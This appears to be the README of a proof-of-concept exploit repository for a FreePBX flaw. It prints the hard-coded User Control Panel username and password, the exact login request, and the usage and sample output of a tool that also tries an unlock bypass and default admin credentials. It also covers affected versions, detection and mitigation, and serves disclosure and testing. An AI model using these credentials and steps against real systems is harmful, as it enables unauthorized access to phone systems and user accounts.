portbuster1337/CVE-2026-46376

# CVE-2026-46376 — FreePBX Unauthenticated UCP Access via Hard-Coded Credentials A critical vulnerability in FreePBX's User Management (`userman`) module allows unauthenticated attackers to access the User Control Panel (UCP) using hard-coded credentials that are embedded during the UCP generic template setup process. **CVSS v4.0: 9.1 (Critical)** | **CWE-798: Use of Hard-Coded Credentials** Disclosed: May 15, 2026 | Reporter: [s0nnyWT](https://github.com/s0nnyWT) ## Details When an administrator uses the optional UCP generic template setup feature (introduced in 2021), a system user `FreePBXUCPTemplateCreator` is created with a **hard-coded, static password**. If the administrator never changes this password after setup, any unauthenticated user on the network can log into the UCP with these credentials. | Field | Value | |-------|-------| | Username | `FreePBXUCPTemplateCreator` | | Password | `1a2b3c@fd48jshs03123ld` | | Source | `Userman.class.php` — password passed through `md5()` | | Attack Vector | Network | | Complexity | Low | | Auth Required | None | | User Interaction | None | | Prerequisite | Admin must have run the UCP generic template setup | ## Affected Versions | Platform | userman module | Affected | Patched | |----------|----------------|----------|---------| | FreePBX 15 | — | 15.0.42+ | N/A | | FreePBX 16 | userman | ≤ 16.0.44 | 16.0.45 | | FreePBX 17 | userman | ≤ 17.0.6 | 17.0.7 | The fix randomizes the password using `bin2hex(random_bytes(24))` during install/upgrade, and existing template creators get their password regenerated on upgrade. ## PoC Usage pip3 install requests python3 poc.py ### Options positional arguments: target Target URL (e.g. http://192.168.1.100) optional arguments: -h, --help show this help message and exit --no-check Skip version pre-flight check --timeout TIMEOUT Request timeout in seconds (default: 15) --method {creds,unlock,admin,all} Which exploit method to run (default: all) -y, --yes Auto-continue even if version is out of range ### Methods 1. **creds** — Log in to UCP via `POST /ucp/ajax.php` with `module=User&command=login` using the hard-coded credentials 2. **unlock** — Attempt unlock key bypass via `?unlockkey=&templateid=` query parameters 3. **admin** — Try common default admin credentials on the ACP ## Example $ python3 poc.py http://192.168.1.100 ============================================ CVE-2026-46376 PoC - FreePBX UCP Access Target: http://192.168.1.100 ============================================ [+] Target is reachable (HTTP 200) [+] FreePBX version: 16.0.30 [+] Version 16.0.30 is in the affected range [+] UCP interface is accessible ============================================ Exploitation ============================================ ============================================ Method 1: Hard-Coded UCP Credentials ============================================ Username: FreePBXUCPTemplateCreator Password: 1a2b3c@fd48jshs03123ld [+] Got CSRF token: a749bea059fa66bd32087a8481a4d07b [+] SUCCESS! Logged in as FreePBXUCPTemplateCreator ============================================ Summary ============================================ Target is VULNERABLE ## Detection To check if a system is exploitable, the PoC sends a login request to `POST /ucp/ajax.php` with `module=User&command=login` and the credentials. A `{"status":true}` response indicates the template creator user exists and the password is still the default. A `{"status":false,"message":"Invalid Login Credentials"}` response means either: - The user does not exist (template setup was never run), or - The password has already been rotated ## Mitigation - Update the `userman` module to 16.0.45 (FreePBX 16) or 17.0.7 (FreePBX 17) - Verify and rotate any existing UCP template credentials — patching does NOT retroactively change already-deployed passwords - Restrict ACP/UCP access to trusted networks using the FreePBX Firewall module - Enable MFA or SAML for additional authentication layers - Audit active UCP sessions for unauthorized logins ## Disclaimer This PoC is provided for **educational and authorized security testing purposes only**. Unauthorized use of this exploit against systems you do not own or have explicit permission to test is illegal. The authors are not responsible for any misuse or damage caused by this tool. ## References - [GHSA-m55x-h47x-v3gx](https://github.com/FreePBX/security-reporting/security/advisories/GHSA-m55x-h47x-v3gx) - [NVD - CVE-2026-46376](https://nvd.nist.gov/vuln/detail/CVE-2026-46376) - [FreePBX userman commit (introduced)](https://github.com/FreePBX/userman/commit/7aa066e99210836e5c223b4f8b7be973ab5ad783)